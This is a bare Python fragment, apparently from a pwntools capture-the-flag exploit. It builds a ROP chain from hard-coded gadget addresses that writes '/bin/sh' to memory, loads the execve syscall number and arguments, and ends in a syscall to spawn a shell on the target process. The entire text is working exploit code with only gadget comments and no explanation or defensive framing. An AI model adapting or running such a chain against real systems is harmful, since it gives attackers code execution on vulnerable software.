payload = p64(0x46bd32)
#0x000000000046bd32: pop rsi; ret; 
payload += p64(0x809068)+p64(0x408ff0)
# 0x0000000000408ff0: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x5446c5)
# 0x00000000005446c5: mov qword ptr [rsi + 8], rax; ret; 
payload += p64(0x51906f)
# 0x000000000051906f: mov edx, 0; ret; 
payload += p64(0x408ff0)
# 0x0000000000408ff0: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x809070)+p64(0x46bd32)
# 0x000000000046bd32: pop rsi; ret; 
payload += p64(0x0)+p64(0x4037d3)
# 0x00000000004037d3: syscall; 
payload += b''
